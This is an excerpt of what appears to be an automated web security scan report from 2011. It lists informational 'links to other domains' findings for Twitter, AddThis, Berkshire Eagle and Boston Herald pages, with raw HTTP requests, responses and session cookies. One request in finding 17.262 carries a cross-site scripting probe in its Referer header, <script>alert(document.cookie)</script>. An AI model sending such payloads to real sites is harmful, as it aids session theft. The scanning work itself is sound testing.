<a href="/sentience" class="url" hreflang="en" rel="contact" title="Kevin Yank"><img alt="Kevin Yank" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/275486302/avatar_highres_mini.jpg" width="24" /></a>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

17.257. http://twitter.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?q=%23title HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225017-82712-33749
ETag: "56fbb024580d3bfb801552c2807fc51e"
Last-Modified: Fri, 28 Jan 2011 14:30:17 GMT
X-Runtime: 0.04756
Content-Type: text/html; charset=utf-8
Content-Length: 19699
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYzRjZDAxNGNhYmFhOTdiZTJjOTQ1NWFlYmVmMzAx%250AMjY6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--469745f10cc0efe32cbf583a12fbdffc0da514e2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296179758/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296179758/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a3.twimg.com/a/1296179758/stylesheets/fronts.css?1296181158" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1296179758/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1296179758/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
</h2>

<script src="http://a2.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

17.258. http://twitter.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?q=%23title HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225146-55911-59297
ETag: "1a4cc07300745eb2972aaf518a8d8062"
Last-Modified: Fri, 28 Jan 2011 14:32:26 GMT
X-Runtime: 0.05842
Content-Type: text/html; charset=utf-8
Content-Length: 20127
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYjg4MDk4ZmY3YmE3Mjg1ODM0MWE4ZDEzNzMzMDMy%250AYzY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--bcf319166b5d80f4aec8cb7e040774d7829464e0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296179758/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296179758/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a2.twimg.com/a/1296179758/stylesheets/fronts.css?1296182903" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1296179758/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1296179758/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
</h2>

<script src="http://a1.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

17.259. http://twitter.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?q=%23title HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234621-30105-56346
ETag: "61317f4bff6a487e772126d465b728cd"
Last-Modified: Fri, 28 Jan 2011 17:10:21 GMT
X-Runtime: 0.04128
Content-Type: text/html; charset=utf-8
Content-Length: 19717
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--e41b589258f43ce00a3c10f5af818420400a35c0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296179758/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296179758/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a0.twimg.com/a/1296179758/stylesheets/fronts.css?1296181726" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1296179758/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1296179758/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
</h2>

<script src="http://a3.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

17.260. http://twitter.com/share

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /share

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /share?url= HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 403 Forbidden
Date: Sat, 29 Jan 2011 01:52:51 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: 1296265971-23870-30415
Last-Modified: Sat, 29 Jan 2011 01:52:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4792
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="en-us" />
<title>Twitter / Valid URL par
...[SNIP]...
</title>
<link href="http://s.twimg.com/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link rel="stylesheet" href="http://yui.yahooapis.com/3.1.1/build/cssfonts/fonts-min.css" type="text/css" charset="utf-8">

<style type="text/css" media="screen">
...[SNIP]...

17.261. http://www.addthis.com/bookmark.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bookmark.php?v=20 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<link rel="canonical" href="http://www.addthis.com/bookmark.php" />
<link href="//cache.addthiscdn.com/www/q0197/style/bookmark.css" rel="stylesheet" type="text/css" />
<style type="text/css" media="only screen and (device-width: 768px)" />
...[SNIP]...
</style>
<script type="text/javascript" src="//cache.addthiscdn.com/www/q0197/js/bookmark.js"></script>
...[SNIP]...

17.262. http://www.berkshireeagle.com/portlet/weather/html/process_mode.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.berkshireeagle.com
Path:   /portlet/weather/html/process_mode.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /portlet/weather/html/process_mode.jsp?displayMode=weather_box_horizontal&zipcode=01201&siteUrl=www.berkshireeagle.com&weatherSection=/weather HTTP/1.1
Host: www.berkshireeagle.com
Proxy-Connection: keep-alive
Referer: http://www.berkshireeagle.com/?f0ba9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e6d2fe4b4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=NCGACERYMBIXOCUUCAWCFEY; UserID=NCGACERYMBIXOCUUCAWCFEY; fPage=true; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DNCGACERYMBIXOCUUCAWCFEY%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1296308397392%3BcVisit%3D1296308397392%3BinitRegType%3DVoluntary%3B; currBrandCheck=NeBer; UserType=Browser; s_cc=true; s_sq=%5B%5BB%5D%5D; __g_c=w%3A1%7Cb%3A2%7Cc%3A291148578685700%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=291148578685700_1_0.01_0_5_1296740401855

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-ATG-Version: ATGPlatform/7.1p2 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html; charset=UTF-8
Vary: Accept-encoding
Expires: Sat, 29 Jan 2011 13:40:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 13:40:19 GMT
Connection: close
Content-Length: 1335

<!-- BEGIN WEATHER PORTLET RENDERING --><script>
   /* var to notify copyright notice in link_controller that it should display */
   MNGiCustomWeather = true;

   //Set the horizontal and vertical position
...[SNIP]...
<td align="center" width="10"><img src="http://extras.mnginteractive.com/live/media/weather/icons/10.gif" border="0" class="weatherIcon"/></td>
...[SNIP]...

17.263. http://www.bostonherald.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /?showResults=1#results HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 156116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fhomepage.bg%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128mankins_believes_pats_days_are_over/srvc=home&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="250" width="315" alt="Logan Mankins believes Patriots days are over"></a>
...[SNIP]...
<a href="/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=1"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/18e69eb546_stpDeLeo012811AC.jpg" alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=1">
...[SNIP]...
<a href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/89c5b31e64_stpRite012811.jpg" alt="ALL WRONG: Anthony Hopkins and Colin O&#x2019;Donoghue star in &#x2018;The Rite,&#x2019; an &#x2018;Exorcist&#x2019;-inspired thriller."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2">
...[SNIP]...
<a href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/da605ca3f0_HastyTEASE.jpg" alt="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a
                        href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3">
...[SNIP]...
<a href="/sports/basketball/other_nba/view/20110128dwyane_wade_out_for_heat-pistons_game_with_sore_wrist/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20110128/stp/87d77e_DWade_01292011.jpg" alt="SITTING: Heat guard and Eastern Conference All Star starter Dwyane Wade will miss tonight&rsquo;s game against the Pistons with a sprained right wrist."></a>
...[SNIP]...
<!--// AD CONTAINER //-->
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23, 2009 file photo in Boston.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=5">
